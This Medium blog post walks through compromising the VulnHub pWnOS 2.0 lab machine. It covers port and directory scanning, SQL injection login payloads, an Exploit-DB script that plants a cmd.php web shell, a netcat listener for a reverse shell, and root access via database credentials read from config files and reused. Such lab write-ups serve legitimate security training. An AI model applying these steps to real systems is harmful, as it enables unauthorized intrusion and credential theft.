Open in app

Sign in

Write

Sign in

VulnHub: pWnOS: 2.0 (Pre-Release)

ratiros01
5 min readApr 27, 2021

pWnOS: 2.0 (Pre-Release)

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to…

www.vulnhub.com

Initial Foothold

  1. Network discovery
nmap -sn 10.10.10.200/24

My target is 10.10.10.100.

2. Port scan

nmap -Pn 10.10.10.100nmap -Pn -p1000- 10.10.10.100

3. OS and service scan

nmap -A -p22,80 10.10.10.100

4. Vuln scan

nmap --script vuln -p22,80 10.10.10.100

There’re directories on HTTP site as shown.

Service Enumeration

  • 22/tcp OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)

Connect to SSH

ssh 10.10.10.100

No any banners appear.

  • 80/tcp Apache httpd 2.2.17 ((Ubuntu))
  1. Nikto scan
nikto -h http://10.10.10.100

There’re sub-directories as listed.

2. Further directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.100/ -x php,txt,html,sh,cgi,bak -q

3. Access the site

Note the email ‘admin@isints.com’ in case I need it.

Register the site.

Follow activation link

Login, nothing comes up.

However if you supply SQL injection, you also get admin panel, but It’s nothing anyway

Here’s my list of tested query

1' or 1=1--   -> failed
1' or 1=1-- -  -> failed
1' or 1=1--+  -> failed
1' or 1=1#  -> succeeded

Another interesting directory is /blog

Viewing page source revealed that It’s Simple PHP Blog 0.4.0.

Exploitation

  1. Search for existing exploit, I came across this script.

Offensive Security's Exploit Database Archive

Simple PHP Blog 0.4.0 - Multiple Remote s. CVE-19070CVE-2005-2787CVE-19012CVE-2005-2733CVE-17779CVE-2005-2192 . webapps…

www.exploit-db.com

Look up scipt number and copy from searchsploit

Copy command

searchsploit -m 1191

Run the script for testing

./1191.pl

Now I have the usage.

Since I want shell, my choice is number 1

./1191.pl -h http://10.10.10.100/blog -e 1

cmd.php is created and stored in http://10.10.10.100/blog/images/

Access the path

Since I created the cmd.php, but I don't know how to use. So I looked up in the code and there’s GET parameter, cmd.

Try the script

http://10.10.10.100/blog/images/cmd.php?cmd=id

It’s worked.

2. Get the reverseshell

Create listener on port 443

rlwrap nc -lvp 443

I used this cheat sheet.

Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…

pentestmonkey.net

The method is intercept the resuest w/ Burp Suite and send to the repeater.

Copy command and encode to URL w/ Burp Suite Decoder

Paste the encoded command

After my tries, I succceded w/ this command.

Privilege Escalation

  1. Directory Explore

There’s many directories to explore as listed:

/var/www/var/var/logs/var/backups/var/mail/home//opt/tmp

After Exploring I came across some files in /var/www and /var

Here’re commands.

cd /var/wwwls -la

I came across mysqli_connect.php

cat /var/www/mysqli_connect.php

It’s a credential of MySQL.

cd /var/ls -la

I came across another mysqli_connect.php

cat /var/mysqli_connect.php

It’s another credential of mysql.

Before use it to access MySQL. I used to login as root in case there’s a re-using password.

su rootpassword: goodday

Failed!

Another one

su rootpassword: goodday
whoami

Now I’m root.

--

--

ratiros01

Written by ratiros01

401 Followers

OSCP

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams